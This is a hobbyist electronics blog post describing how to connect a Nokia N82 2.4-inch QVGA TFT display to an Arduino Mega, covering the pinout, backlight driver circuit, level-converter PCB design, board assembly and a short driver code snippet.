| text (string, 454–608k chars) | url (string, 17–896 chars) | dump (91 classes) | source (1 value) | word_count (int64, 101–114k) | flesch_reading_ease (float64, 50–104) |
|---|---|---|---|---|---|
WPF Frame cannot inherit value from parent
Hello,
I previously asked the same question at this link.
If the parent control defines a value for the "Foreground" property, the WPF elements inside the Frame will not inherit that property's value.
If I add a new Page to the Frame and then change the theme of the window, the theme is not applied to the Page inside the Frame.
Why is it not inheriting from the parent?
I need to set the value to null and re-apply the theme when the Frame loads,
which slows the application down.
Can you please help me with this?
Ref questions: I am not getting any proper solution for it.
Download the video and code from here.
I have created a video as well as a small application showing the issue.
Here, when I press the Add New button, a new Frame is added to the DockLayoutManager,
and the theme is not applied to the Frame's child, i.e. the Page and the controls inside the Page.
The Frame stops the theme from being applied to the Page.
Thanking you in advance.
Regards,
Vipul Langalia
Hi Vipul,
From your description, I understand there is an issue where a WPF Frame cannot inherit a value
from its parent.
I have an idea. I suggest you create a class to manage the Color property; the parent
Frame and the sub-Frame both get their Color property from the class which manages the Color.
Firstly, we define a class to store the color property; we name this class Foreground.
Secondly, we create an instance of Foreground.
Thirdly, we bind the instance's Color property to the Frame.
I created a simple example to demonstrate what I said. It looks something like this,
XAML Code (element names here are illustrative):
<Window x:Class="WpfApplication1.MainWindow"
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml">
    <StackPanel>
        <TextBox x:Name="TxtColor" Text="{Binding [0].Color}" />
        <Button x:Name="BtnShow" Content="Show Color" Click="BtnShow_Click" />
    </StackPanel>
</Window>
Code Behind:
public partial class MainWindow : Window
{
    // Shared collection that holds the color; both parent and child bind to it.
    ObservableCollection<Foreground> collection = new ObservableCollection<Foreground>();

    public MainWindow()
    {
        InitializeComponent();
        collection.Add(new Foreground() { Color = "Red" });
        this.DataContext = collection;
    }

    private void BtnShow_Click(object sender, RoutedEventArgs e)
    {
        MessageBox.Show(collection[0].Color);
    }
}

public class Foreground
{
    private string color;

    public string Color
    {
        get { return color; }
        set { color = value; }
    }
}
Here are some references about this issue.
#WPF Passing a value from parent to a child 'page' hosted in a frame
#ObservableCollection<T> Class
If I misunderstood, do not hesitate to contact me.
Have a nice day!
|
http://social.msdn.microsoft.com/Forums/en-US/c1423d20-ca00-46b2-bd14-5df194ac0bd4/wpf-frame-can-not-inherit-value-from-parent
|
CC-MAIN-2014-35
|
refinedweb
| 394
| 58.28
|
This virtual class represents objects that can be moved to an arbitrary 2D location and rotation.
The current transformation is set through SetCoordinateBase. To ease the implementation of descendant classes, mpMovableObject is in charge of bounding-box computation and layer rendering, assuming that the object updates its shape in m_shape_xs and m_shape_ys.
Definition at line 1433 of file mathplot.h.
#include <mrpt/otherlibs/mathplot/mathplot.h>
Default constructor (sets location and rotation to (0,0,0))
Definition at line 1438 of file mathplot.h.
References mpLAYER_PLOT.
Definition at line 1448 of file mathplot.h.
Get brush set for this layer.
Definition at line 314 of file mathplot.h.
Get a small square bitmap filled with the colour of the pen used in the layer.
Useful to create legends or similar reference to the layers.
Gets the 'continuity' property of the layer.
Definition at line 266 of file mathplot.h.
Get the current coordinate transformation.
Definition at line 1452 of file mathplot.h.
Get Draw mode: inside or outside margins.
Definition at line 293 of file mathplot.h.
Get font set for this layer.
Definition at line 251 of file mathplot.h.
Get the layer type: a layer can be of different types (plot lines, axes, info boxes, etc.); this method returns the right value.
Definition at line 302 of file mathplot.h.
Get inclusive right border of bounding box.
Reimplemented from mpLayer.
Definition at line 1478 of file mathplot.h.
Get inclusive top border of bounding box.
Reimplemented from mpLayer.
Definition at line 1486 of file mathplot.h.
Get inclusive left border of bounding box.
Reimplemented from mpLayer.
Definition at line 1474 of file mathplot.h.
Get inclusive bottom border of bounding box.
Reimplemented from mpLayer.
Definition at line 1482 of file mathplot.h.
Get layer name.
Definition at line 246 of file mathplot.h.
Get pen set for this layer.
Definition at line 256 of file mathplot.h.
Check whether this layer has a bounding box.
The default implementation returns TRUE. Override and return FALSE if your mpLayer implementation should be ignored by the calculation of the global bounding box for all layers in a mpWindow.
Reimplemented from mpLayer.
Definition at line 1470 of file mathplot.h.
Check whether the layer is an info box.
The default implementation returns FALSE. It is overridden to return TRUE for the mpInfoLayer class and its derivatives. This is necessary to define mouse-action behaviour over info boxes.
Reimplemented in mpInfoLayer.
Definition at line 178 of file mathplot.h.
Checks whether the layer is visible or not.
Definition at line 306 of file mathplot.h.
Plot given view of layer to the given device context.
An implementation of this function has to transform layer coordinates to wxDC coordinates based on the view parameters retrievable from the mpWindow passed in w. Note that mpWindow already provides the public methods x2p, y2p and p2x, p2y, which transform layer coordinates to DC pixel coordinates; user code should rely on them for portability and so that future changes are applied transparently, instead of implementing the following formulas manually.
The passed device context dc has its coordinate origin set to the top-left corner of the visible area (the default). The coordinate orientation is as shown in the following picture:
(wxDC origin 0,0)
    x---------------> ascending X ----------------+
    |                                             |
    |                                             |
    V ascending Y                                 |
    |                                             |
    |                                             |
    |                                             |
    +---------------------------------------------+  <-- right-bottom corner of the
                                                         mpWindow visible area.
Note that Y ascends in downward direction, whereas the usual vertical orientation for mathematical plots is vice versa. Thus Y-orientation will be swapped usually, when transforming between wxDC and mpLayer coordinates. This change of coordinates is taken into account in the methods p2x,p2y,x2p,y2p.
Rules for transformation between mpLayer and wxDC coordinates
dc_X    = (layer_X - mpWindow::GetPosX()) * mpWindow::GetScaleX()
dc_Y    = (mpWindow::GetPosY() - layer_Y) * mpWindow::GetScaleY()   // swapping Y-orientation
layer_X = (dc_X / mpWindow::GetScaleX()) + mpWindow::GetPosX()      // scale guaranteed to be not 0
layer_Y = mpWindow::GetPosY() - (dc_Y / mpWindow::GetScaleY())      // swapping Y-orientation
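To make the transformation rules concrete, here is a minimal sketch of the same formulas (Python is used purely for illustration; pos_x, pos_y, scale_x and scale_y stand in for the mpWindow::GetPosX/GetPosY/GetScaleX/GetScaleY values):

def layer_to_dc(layer_x, layer_y, pos_x, pos_y, scale_x, scale_y):
    dc_x = (layer_x - pos_x) * scale_x
    dc_y = (pos_y - layer_y) * scale_y   # Y-orientation is swapped
    return dc_x, dc_y

def dc_to_layer(dc_x, dc_y, pos_x, pos_y, scale_x, scale_y):
    layer_x = (dc_x / scale_x) + pos_x   # scale guaranteed to be non-zero
    layer_y = pos_y - (dc_y / scale_y)   # Y-orientation is swapped
    return layer_x, layer_y

# Round trip: converting layer coordinates to DC pixels and back recovers the input.
dc = layer_to_dc(3.0, 4.0, 1.0, 2.0, 10.0, 10.0)
assert dc_to_layer(dc[0], dc[1], 1.0, 2.0, 10.0, 10.0) == (3.0, 4.0)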
Set label axis alignment.
Definition at line 1493 of file mathplot.h.
Set layer brush.
Definition at line 318 of file mathplot.h.
Set the 'continuity' property of the layer (true:draws a continuous line, false:draws separate points).
Definition at line 261 of file mathplot.h.
Set the coordinate transformation (phi in radians, 0 means no rotation).
Definition at line 1461 of file mathplot.h.
References mpALIGN_NE, and Eigen::internal::y.
Set Draw mode: inside or outside margins.
Default is outside, which allows the layer to draw up to the mpWindow border.
Definition at line 289 of file mathplot.h.
Set layer font.
Definition at line 280 of file mathplot.h.
Set layer name.
Definition at line 275 of file mathplot.h.
Set layer pen.
Definition at line 285 of file mathplot.h.
Sets layer visibility.
Definition at line 310 of file mathplot.h.
Must be called by the descendant class after updating the shape (m_shape_xs/ys), or when the transformation changes.
This method updates the buffers m_trans_shape_xs/ys, and the precomputed bounding box.
Shows or hides the text label with the name of the layer (default is visible).
Definition at line 270 of file mathplot.h.
A method for 2D translation and rotation, using the current transformation stored in m_reference_x,m_reference_y,m_reference_phi.
The precomputed bounding box:
Definition at line 1518 of file mathplot.h.
Layer's brush.
Reimplemented in mpInfoLayer.
Definition at line 323 of file mathplot.h.
Specify if the layer will be plotted as a continuous line or a set of points.
Definition at line 325 of file mathplot.h.
Select whether the layer should draw only inside the margins or over the whole DC.
Definition at line 327 of file mathplot.h.
Holds label alignment.
Definition at line 1493 of file mathplot.h.
Layer's font.
Definition at line 318 of file mathplot.h.
Layer's name.
Definition at line 324 of file mathplot.h.
Layer's pen.
Definition at line 322 of file mathplot.h.
The coordinates of the object (orientation "phi" is in radians).
Definition at line 1500 of file mathplot.h.
This contains the object points, in local coordinates (to be transformed by the current transformation).
Definition at line 1508 of file mathplot.h.
Definition at line 1508 of file mathplot.h.
States whether the name of the layer must be shown (default is true).
Definition at line 326 of file mathplot.h.
The buffer for the translated & rotated points (to avoid recomputing them with each mpWindow refresh).
Definition at line 1513 of file mathplot.h.
Definition at line 1513 of file mathplot.h.
Defines the layer type, which is assigned by the constructor.
Definition at line 328 of file mathplot.h.
Toggles layer visibility.
Definition at line 329 of file mathplot.h.
|
http://reference.mrpt.org/stable/classmp_movable_object.html
|
crawl-003
|
refinedweb
| 1,106
| 53.27
|
>>>>> "fred" == fred <fredmfp@...> writes:
fred> Hi the list, Is it possible to have some curves not legended
fred> ?
ax.plot(x,y,label='_nolegend_')
Help on function legend in module matplotlib.pylab:
legend(*args, **kwargs)
LEGEND(*args, **kwargs)
Place a legend on the current axes at location loc. Labels are a
sequence of strings and loc can be a string or an integer
specifying the legend location
USAGE:
Make a legend with existing lines
>>> legend()
legend by itself will try and build a legend using the label
property of the lines/patches/collections. You can set the
label of a line by doing plot(x, y, label='my data') or
line.set_label('mydata'). If label is set to '_nolegend_', the
item will not be shown in legend.
JDH
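For reference, here is a minimal sketch (not from the original thread) exercising the label='_nolegend_' trick against the modern matplotlib API:

import matplotlib.pyplot as plt

x = range(5)
fig, ax = plt.subplots()
ax.plot(x, [v * 2 for v in x], label='shown')        # appears in the legend
ax.plot(x, [v * 3 for v in x], label='_nolegend_')   # excluded from the legend
ax.legend()
plt.show()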
Hi to all,
I'm writing a web application with Zope + Python. I've made a first try to
insert a graph using a Zope external method, following the instructions
reported in this sample:
I have some problems with the imports; Zope tells me:
Error Type: ImportError
Error Value: cannot import name FigureCanvasAgg
This is due to instruction 7:
1 import matplotlib
2 matplotlib.use('Agg')
3 from pylab import *
4 from os import *
5 from StringIO import StringIO
6 from PIL import Image as PILImage
7 from matplotlib.backends.backend_agg import FigureCanvasAgg
[...]
The path of the file backend_agg.py is correct. Have you got any
suggestions?
Thanks.
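For context, a minimal standalone Agg-rendering script looks something like the following (a sketch independent of Zope; if this fails with the same ImportError, the matplotlib installation itself is broken):

import matplotlib
matplotlib.use('Agg')  # select the non-interactive Agg backend before any pylab/pyplot import

from matplotlib.figure import Figure
from matplotlib.backends.backend_agg import FigureCanvasAgg

fig = Figure()
canvas = FigureCanvasAgg(fig)   # the import that fails in the report above
ax = fig.add_subplot(111)
ax.plot([0, 1, 2], [0, 1, 4])
canvas.print_figure('test.png')  # render the figure to a PNG file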
Hi the list,
Is it possible to have some curves not legended?
A sample example is better:
I wish the pointed curves not to be displayed in the legend box.
How can I do this?
Cheers,
Hi the list,
I have looked for in mailing-list archive, but did not find anything
relevant.
I use matplotlib 0.87-5 and I want to try some examples concerning fonts
in .examples/.
When I run fonts_demo.py, I get the following messages:
:~...matplotlib-0.87.5/examples/{58}/> python fonts_demo.py
/usr/local/lib/python2.4/site-packages/matplotlib/font_manager.py:989:
UserWarning: Could not match cursive, fantasy, sans-serif, italic, normal. Returning
/usr/local/lib/python2.4/site-packages/matplotlib/mpl-data/Vera.ttf
warnings.warn('Could not match %s, %s, %s. Returning %s' % (name,
style, variant, self.defaultFont))
What am I doing wrong?
In fact, all fonts displayed in the window are the same.
Any suggestion ?
Cheers,
PS: Python 2.4, freetype-2.1.7-6, libpng-1.2.8 on a Debian Sarge Linux box.
Hello,
I can't seem to get matplotlib-0.87.5 to work with numpy1.0rc:
Python 2.4.3 (#1, Sep 21 2006, 13:06:42)
[GCC 4.1.1 (Gentoo 4.1.1)] *
File "/usr/lib/python2.4/site-packages/matplotlib/pylab.py", line 196, in ?
import cm
File "/usr/lib/python2.4/site-packages/matplotlib/cm.py", line 5, in ?
import colors
File "/usr/lib/python2.4/site-packages/matplotlib/colors.py", line 33, in ?
from numerix import array, arange, take, put, Float, Int, where, \
File "/usr/lib/python2.4/site-packages/matplotlib/numerix/__init__.py", line
74, in ?
Matrix = matrix
NameError: name 'matrix' is not defined
This is on an AMD64 platform. I tried removing the build directories of both
packages, and reinstalling, but that didn't work.
Am I missing something?
Thanks!
Peter
|
http://sourceforge.net/p/matplotlib/mailman/matplotlib-users/?viewmonth=200609&viewday=22
|
CC-MAIN-2015-18
|
refinedweb
| 585
| 70.09
|
How about:
import matplotlib.pyplot as plt
x_sqr = 42.42
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(range(5))
ax.text(3, 2, r'x$^2$ = %.2f' % x_sqr)
plt.show()
Cheers,
Scott
---------- Forwarded message ----------
From: Scott Sinclair <scott.sinclair.za@...287...>
Date: 17 May 2011 14:52
Subject: Re: [Matplotlib-users] result in the graph
To: Waleria <waleriantunes@...287...>
On 17 May 2011 14:35, Waleria <waleriantunes@...287...> wrote:
Hello all,
I have this code: (part that generates the chart)
[...] So I need to show a result in the graph. I have line 69 (the variable
x_sqr) in the code, and I need to show the result of that variable in the graph. How can
I do this?
|
https://discourse.matplotlib.org/t/result-in-the-graph/15464
|
CC-MAIN-2019-51
|
refinedweb
| 117
| 80.28
|
Jay?
Personally, I wish that the design of C# had taken properties a bit more into account and given us a simpler way to express them in the simple (and considerably more common) scenarios where they are nothing but simple wrappers. I know it is a tricky syntax to come up with, but it would be *a lot* cleaner, for component developers and internal situations, if you could easily write
public property string X{get;set;}
or just
public string X{get;set;}
I assume that such a construct was considered and thrown out for good reason, but it is something I’d like to see some day.
That’s fine, but it means that data binding and serialization (both XML and binary) break right?
Reflection breaks too right? So all the code generators go out the window.
Don’t get me wrong, I agree with the use of public fields instead of properties. But it seems to me that the time to decide this issue was long before now. We’re stuck with it, and to change now would be pretty disastrous.
Unless you mean, "Use public fields unless you have to use properties". That makes sense.
Daniel: It seems to me at that point you’re just writing a public field but with some extra sugar. Maybe an attribute modifier would be a better choice?
[property]
public string hootie = "";
The definition of the syntax is tough. In the ideal case you would want to allow
1) simple getset properties
2) simple get properties with either a private set or a compiler generated direct field set(similar to how simple event invocations work)
3) similar simple set properties with private or generated get code.
4) the ability to apply attributes to that property. The above syntax implies that you define a field which the compiler generates a property for. This would make it hard to apply an attribute to that property, and certainly would make it impossible in a clean manner.
While the attribute would work, it lacks a clean way to express granularity, and it requires considerable modification to the expression if you decide to change the property. To express granularity, you’d end up defining enums and other bits of data which the language already defines as pseudo-keywords, and there is no way to fix the difference in expression. Also, I think attributes are really overused and shouldn’t be used to implement language features.
Also, looking at it again, even with the attribute it looks like a field, not a property, and will be read as such.
Each syntax I’ve looked at has one downside or another. I finally decided that the public string X{get;set;} approach made the most sense because of how similar it is to the existing syntax. It doesn’t allow for custom fields, but it does solve a lot of the issues with properties, as I see them. The compiler generating the underlying field access is a possible way to avoid the need for custom fields, although it has some issues (the accessor could be used as a ref parameter, for example, resulting in an assignment even though it’s supposedly a "get", etc.).
I know you said ‘single project that gets built all at once’ – but just to be clear and picky, you also have to make sure you never call that project from anywhere else or it becomes a real pain to change. Changing a public field to a property will change your code’s compiled interface, breaking any calling code, until that code is recompiled too.
Personally it is rare that I’m sure code will never be used elsewhere one day… Maybe these preferences just come down to the types of projects one does. If you use code folding they are pretty much identical for scanning code (though I hate the way accessors need those extra clicks to unfold, ugh). The main argument against using them seems to be ‘too much typing’, which sounds more like a syntax/IDE problem than an inherent problem with properties, no? It is pretty easy to make a macro or codegen; not sure I’d sacrifice even a tiny benefit if that is the basic reason…
Just support something like this:
public Button CancelButton { set; get; }
(maybe some extra keyword)
now have the compiler translate this to the following code automatically:
private Button cancelButton;
public Button CancelButton
{
set { this.cancelButton = value; }
get { return this.cancelButton; }
}
I’m really wondering why this shortcut wasn’t supported in .NET 1.0 already.
Whidbey C# now supports crazy geek toys like Generics but still no support for simple stuff like this 🙁
FixIt:
In VS 2005 C# you can type prop and press the tab key twice, and a property will be added with a private field; this will make it much easier and faster to add a property to the code.
Sorry FixIt, I misunderstood your post; I read it as if the IDE should automatically add the whole property body with a private field. So please ignore my post.
I like FixIt's idea about just adding
public Button CancelButton { set; get; }
But this is a similar way of adding a property to an interface. So I think this could confuse developers.
You could add a keyword:
public Button CancelButton { set; get; auto; }
or something like that.
There is definitely a way of doing this easily.
My wish for properties (and I’m not alone here) includes the ability to make get and set differently accessible. More often than not, "get" would be public and "set" might be internal or private.
Clinton Pierce:
You can set different protection levels on set and get in C# 2.0
I agree with Scott. I use properties all the time – but that is mainly because of the chance that I might need to bind or use reflection with an object (etc).
However, I *don’t* like the idea mentioned by some here about using something like:
public Button CancelButton { set; get; }
and have the compiler interpret that to mean:
private Button cancelButton;
public Button CancelButton
{
set { this.cancelButton = value; }
get { return this.cancelButton; }
}
I don’t like the idea of "assumed" private members. That to me seems to fix a manifestation of the problem rather than just fix the problem itself. I’d rather see things like object binding just work with public fields as well as properties.
I look forward to VS 2005 and being able to use expansion to create my properties.
I think that despite this routine work, using properties is still the right way. Modern apps look like this:
database tables/fields mapped to classes/properties mapped to UI fields. And of course we use stored procedures when speaking to database tables. It is so easy to map SP parameters to class properties (datatypes, etc.) that it makes it the right way.
Download the free add-in called QuickCode from. It lets you customize simple keyword expansion from within VS.NET 2002/2003. It’s really cool, and if you consider that you can reduce the amount of typing you do, yet end up with the encapsulation of properties, it’s well worth the $29…
More info on properties. This sort of extends the topic Kyle covered in his article. In Jay’s post, the read-only situation was something I hadn’t thought of when sticking with the simpler public properties. But really, regardless of which method you use, if you decide to go from read/write to read-only you’re going to break something. [C# Stuff]…
Ryan:
Do you write add/remove handlers for all of your events, or are you OK with those assumed private members?
The problem isn’t necessarily that binding doesn’t work with fields as that fields aren’t properties and don’t provide *any* of the extras that properties do. I think that if the language had been designed assuming public fields would never be used, property design would have been considerably simpler. This kind of work already went into events, because writing simple event handlers manually is a pain and usually a waste of effort. Writing simple property accessors manually is a pain as well, but it wasn’t handled anywhere near as gracefully.
It’s too late now, but what about
public field string _name;
public property string Name;
I generally would agree with Ryan about assumed private members being a bad thing. But I also like what I think Thomas is hinting at – what if a simple
public property string Name;
was equivalent to something like
private string ___name;
public string Name
{
get { return ___name; }
set { ___name = value; }
}
BUT if you declared Name using get & set, nothing would be automagically linked up?
Of course is there really any difference between that and a public field?
> Of course is there really any difference between that and a public field?
As a matter of implementation, there is quite a bit of difference. A property != a field and should never be considered to, even if they look alike in source. They may provide the same service but they do it quite differently. It’s been suggested that a property is far closer to a method than a field. I don’t quite understand why people are so unaware of the differing semantics. These "good as" arguments are a touch scary.
2 points for me on using properties over public fields (for simple get/set, no other logic implementations) are consistency and debug-ability.
From the debugging side it means that a break point can be placed on a single point and all writes to a variable can be trapped.
> Of course is there really any difference between that [get/set property] and a public field?
Properties can’t be passed as ref/out method parameters.
Why not just make all read-only accessors/properties not read-only to the local object, or use a built-in property-property ".Value" to represent the underlying private member? Maybe a friend modifier to allow objects from the same namespace to access the private member?
// read-only
property string Name {get;}
// write-only: initializer built in…
property friend Location Location {set;} = new Location("Unknown");
// read-write
property int Age = 0;
// somewhere else in the same object scope
// use .Value to short-circuit accessibility
this.Name.Value = "Your Name";
this.Age = 33;
this.WhereAbouts = new Location("Home");
// in another object in the same namespace:
Location personLocation = Person.WhereAbouts.Value;
|
https://blogs.msdn.microsoft.com/ericgu/2004/04/29/jay-and-properties/?replytocom=18123
|
CC-MAIN-2018-13
|
refinedweb
| 1,756
| 60.55
|
using System;

public class Example
{
   public static void Main()
   {
      string str1 = "a";
      string str2 = str1 + "b";
      string str3 = str2 + "c";
      string[] strings = { "value", "part1" + "_" + "part2", str3,
                           String.Empty, null };
      foreach (var value in strings)
      {
         if (value == null) continue;

         bool interned = String.IsInterned(value) != null;
         if (interned)
            Console.WriteLine("'{0}' is in the string intern pool.", value);
         else
            Console.WriteLine("'{0}' is not in the string intern pool.", value);
      }
   }
}

using System;
using System.Text;

public class Example
{
   public static void Main()
   {
      // String str1 is known at compile time, and is automatically interned.
      String str1 = "abcd";
      // Constructed string, str2, is not explicitly or automatically interned.
      String str2 = new StringBuilder().Append("wx").Append("yz").ToString();
      Console.WriteLine();
      Test(1, str1);
      Test(2, str2);
   }

   public static void Test(int sequence, String str)
   {
      Console.Write("{0}) The string, '", sequence);
      String strInterned = String.IsInterned(str);
      if (strInterned == null)
         Console.WriteLine("{0}', is not interned.", str);
      else
         Console.WriteLine("{0}', is interned.", strInterned);
   }
}
|
https://msdn.microsoft.com/en-us/library/system.string.isinterned(v=vs.110).aspx
|
CC-MAIN-2018-34
|
refinedweb
| 154
| 63.25
|
The .NET framework has a class (or rather a set of related classes) that makes sending mails via SMTP relatively simple. I think a good point to start reading about that is.
However, as you have a rich text box as the source of your mail text, you may want to send it formatted, which isn't that easy anymore. In particular, sending RTF-formatted text incurs some specific problems that have recently been discussed in, with not very optimistic conclusions. OTOH, sending the formatted text as HTML, which is the common way of doing that, of course requires format conversion/HTML generation, which is additional effort.
BTW, when you talk about "without any login requirement", I think the best you can reasonably get is that your mailing application holds the credentials to log into the SMTP server (or obtains them from Windows) and just the user doesn't need to enter any login. The only alternative to that, out on the net, that comes to my mind now is SMTP servers that allow anonymous login, but I think they'll always have a bad reputation (or will quickly get one) due to being (ab)used to distribute spam. A corporate SMTP server that only allows anonymous login from inside the corporate network might be an alternative, but if you have that, then why not simply obtain login credentials for your program from the admin in the first place?
Reply:
I have this code:
using namespace System::Net::Mail;
private: System::Void button1_Click(System::Object^ sender, System::EventArgs^ e) {
SmtpClient^ sc = gcnew SmtpClient();
sc->Host = "localhost";
sc->Port = 25;
MailMessage^ mm = gcnew MailMessage();
mm->From = gcnew MailAddress("bad@nysc");
mm->To->Add(gcnew MailAddress("emre@nyeotech.com"));
mm->Body = richTextBox1->Text;
sc->Send(mm);
}
};
}
It compiles fine, but when i click the button I get this error: An unhandled exception of type 'System.Net.Mail.SmtpException' occurred in System.dll
Originally Posted by emreozpalamutcu
It compiles fine, but when i click the button I get this error: An unhandled exception of type 'System.Net.Mail.SmtpException' occurred in System.dll
And what is the descriptive message carried by the exception? It usually is right next to the exception type mentioned in the exception message box. These messages usually are quite informative in the .NET framework.
And you definitely do have an SMTP server running on your localhost?
Here is the exception:
Additional information: Failure sending mail.
That's all the other info. And what do you mean by an SMTP server running on my localhost? How do I do that, and if other people use this program, do they have to do it too?
Originally Posted by emreozpalamutcu
Here is the exception:
Additional information: Failure sending mail.
That's all the other info [...]
Ok, I dug out the log files from the early tests of my own little command line mailer and it turned out that, in case the SMTP server is not found, the actual interesting info is hidden inside the inner exception which is available as the exception's InnerException property. Are you catching and displaying the exception yourself? (At least it looks like that because the .NET runtime's built-in exception message box displays much more information.) In that case I suggest you output e->ToString() rather than e->Message. The ToString() member of the .NET exceptions retrieves a bunch of useful information in a single call. I use it all the time.
And what do you mean by an SMTP server running on my localhost? How do I do that, and if other people use this program, do they have to do it too?
If you don't know whether you have one, then you probably don't have one.
Everybody (you, your users, me etc.) needs an SMTP server to send mail (as I already implied in post #2). An SMTP client like your program or my little command line mailer (or Outlook or Thunderbird for that matter) merely commits the mail(s) to the server which in turn initiates the actual process of transporting the mail over the net. So the SMTP server can be seen as kind of a post box.
You, as well as your users, need the proper credentials (user name and password) to log into the server. To free the user from entering the credentials every time he/she wants to send mails, the client usually is configured to remember the credentials. But of course that does not mean you don't need them. My own mailer, for instance, currently can acquire the credentials from the command line, its app config file or Windows (in case the user has the same credentials on Windows and the SMTP server).
|
http://forums.codeguru.com/showthread.php?513815-How-to-email-a-simple-plain-text-on-windows-form-applications&p=2021316
|
CC-MAIN-2014-10
|
refinedweb
| 785
| 61.16
|
Hi Neil,
You'll want to get the collection in your controller, loop through in the view and put a tick or cross based on one of the properties on the model.
Nothing wrong with simple logic like this in your views
if @set_ids.include?(album.set_id)
Hey Mark. Thanks for the reply. The problem is that for every set returned from Flickr I need to do a find on my local Albums table to see if a corresponding record exists. So I basically need to do that check and I want to build up a sort of hash with the album name, flickr id and a tick or cross whether I have a local copy or not. I'm thinking the logic would be something along the lines of:
@sets = Flickr.get_set_list
@sets.each do |set|
  Album.find_by_flickr_id(set[:id])
end
But I need to put that info into a hash and then pass that to the view. Is this too much logic to put in my controller? And if so, it doesn't seem right to me putting it in the model either, so I'm not really sure where to put it.
Also, how would I get that data into the hash I'd want to end up with?
Thanks, Neil
I'm not sure what's inside the get_set_list method but it sounds like you should just be able to do one query with a join between them.
If that's not the case you might just be able to search for the albums with the id's from the first query.
@set_ids = Flickr.get_set_list.map{ |set| set.id }
@albums = Album.where("flickr_id in (?)", @set_ids)
Yes, you want to keep your controllers as light as possible. The model is the correct place to put this sort of thing, or if you're doing a lot with Flickr then you might put it all inside the Flickr module.
class Album
  def self.within_flickr_sets
    set_ids = Flickr.get_set_list().map{ |set| set.id }
    Album.where("flickr_id in (?)", set_ids)
  end
end
Then in your controller you can just have this:
@albums = Album.within_flickr_sets()
|
https://www.sitepoint.com/community/t/where-do-i-do-this/19320
|
CC-MAIN-2017-09
|
refinedweb
| 353
| 81.33
|
Nokia N82 2.4 inch QVGA TFT on the Arduino
It’s been a few months now since I released the original two articles that detailed the design, build and optimised software library for the 2.0″ Nokia 6300 QVGA TFT connected to the Arduino Mega XMEM interface. Judging by the responses I’ve had, there’s a lot of you out there that are interested in connecting these mobile phone TFTs to your Arduinos.
Today we move on to reverse-engineer another Nokia QVGA TFT. This time we’re going to tackle the Nokia N82. Read on to find out how I got on.
The N82 TFT
The N82 TFT is a 2.4″ panel that’s also found in the N77, N78, N79, E66, E52, E75 and 6210S. It’s clear that back in the not-so-distant past, when Nokia was the undisputed market leader in mobile phones, they knew how, as a company, to take a successful design and keep re-releasing it over and over again with small tweaks to keep the income rolling in. Replacement N82 panels are available at the time of writing for as low as £3 on eBay.
Two TFTs. The N82 next to the 6300.
You can get an idea of the physical size difference between the 2.4″ and 2.0″ panels from the above photograph. The resolution is identical, the pixels are simply larger on the N82 panel. Pixel densities are around 200ppi for the 6300 and 167ppi for the N82. Having a higher pixel density means that your graphics appear smoother. Having a lower pixel density makes your text larger, and perhaps more readable.
The schematic and the connector
It must be our lucky day because the pinout to the N82 is identical to the 6300 and it uses the same 24-pin board-to-board connector too! The 0.4mm pitch connector:
gsmserver.com
cellnetos.com
stellatech.com
The pinout for the connector is shown here:
Here’s a photograph of the connector plug. If you look closely you can see where the ground pins connect directly into the ‘ground pour’ inside the ribbon cable. This helps to identify where pin 1 is located when doing the reverse engineering.
The connector on the LCD FPC cable
The backlight
The backlight shares the same design as the 6300 in that it consists of four white LEDs in series. Therefore we will use the same NCP5007 constant current LED driver from OnSemi that we’ve been using in all our Nokia TFT designs so far.
The NCP5007 in SOT23-5 package
The NCP5007 will be configured to supply a constant 20mA through the backlight circuit and we will use a PWM signal on the ENABLE pin to vary the brightness. The NCP5007 really is a wonderful little device – truly one of those things that ‘just works’ and I’ll use it wherever I need to drive up to 5 LEDs.
The development board schematic
We’ll gloss over the explanation of how we drive the TFT controller using the Arduino Mega XMEM interface because that’s all been explained in this article and there are no changes to the interface in this design.
The Eagle schematic, click to download a PDF.
Just as before, we choose to use the 74ALVC164245 16-channel level converter from NXP to handle the conversion of the 5V signals from the Arduino down to a safe level of 3.3V where they won’t damage the panel.
The Eagle PCB design, click for larger.
In this design I’m using the TSOP-48 (0.5mm) pitch version of the level converter rather than the SSOP-48 (0.635mm) pitch that I used in the 6300 design. The reason for the change is that the TSOP-48 package is more readily available from the suppliers that I use.
Another slight change, again due to parts availability, is the inductor. I’ve switched to a slightly different model that has a larger footprint but is otherwise functionally identical to the one I was using before.
Bill of Materials
Here’s a full list of parts used in this development board.
The development board
I generated the Gerbers from Eagle and sent them off to ITead Studio to be printed using their very good value prototype PCB service. A few weeks later they arrived and all were perfect, just as I’ve come to expect.
The front of the PCB. The pads are not gold, the tungsten lighting used in the photograph just makes them look like they are.
The back of the PCB
Building the board is a familiar process for me by now. In case you’re interested, this is the procedure that I follow.
- Flux the pads then tin them with an iron so they all have little solder bumps on them. For the level converter and the connector this means loading up the tip of the iron with solder and lightly dragging it over the pads.
- Use a very small amount of paste flux as a glue to hold down the level converter, connector and inductor in place on the board. Overdoing the flux can cause bubbling during the reflow which will cause the component to move out of position (very bad).
- Heat the board with the three parts on a hot-plate until the solder reflows and the parts sit down into position.
- Inspect the joints under a microscope and use a fine-tip iron to touch each one that shows any movement when prodded with a pin. There will be at least one…
- Use tweezers and a hot-air gun to reflow the other components into place.
- Clean the board with soapy water and a toothbrush then leave for at least 24 hours in the airing cupboard to dry out.
- Solder the 2.54mm headers and test.
So it’s not a short process but the rewards are worth the effort. Here’s the fully built development board.
The board, fully built and awaiting the LCD
And here’s a shot with the LCD fitted. The 2.4″ display is a little oversized for the PCB but fits firmly and saves the additional cost of the larger PCB just to mount the screen.
The board with the LCD attached.
Driver source code
My XMEM driver code has been updated to include support for the N82. You will need to download at least version 2.1.0 of the driver to get that support.
Because the panel is driven identically to the Nokia 6300, all the examples will work as-is with no changes. However, for completeness I have included “N82” driver names just in case I need to create specific customisations for this panel in the future.
#include "NokiaN82.h" using namespace lcd; typedef NokiaN82_Portrait_262K TftPanel;
The example snippet shows the driver name (NokiaN82_Portrait_262K ) and the header file (NokiaN82.h). Similar driver names for the Landscape orientation and 16M and 64K display modes (if supported by the panel) are included.
Another example
I created a full example that exercises the compressed graphics capability of the driver in a simulation of the output from a weather station on the Arduino. The source code is included in version 2.1.0 and above of the software driver.
This demo packs 100Kb of compressed graphics into the Atmega1280, and the controller code takes up a further 10Kb or so. The graphics are decompressed on-the-fly from flash by my LZG decoder routine included with the driver.
Here’s a video of the demo in action. Watch it here or click to watch in HD at YouTube.
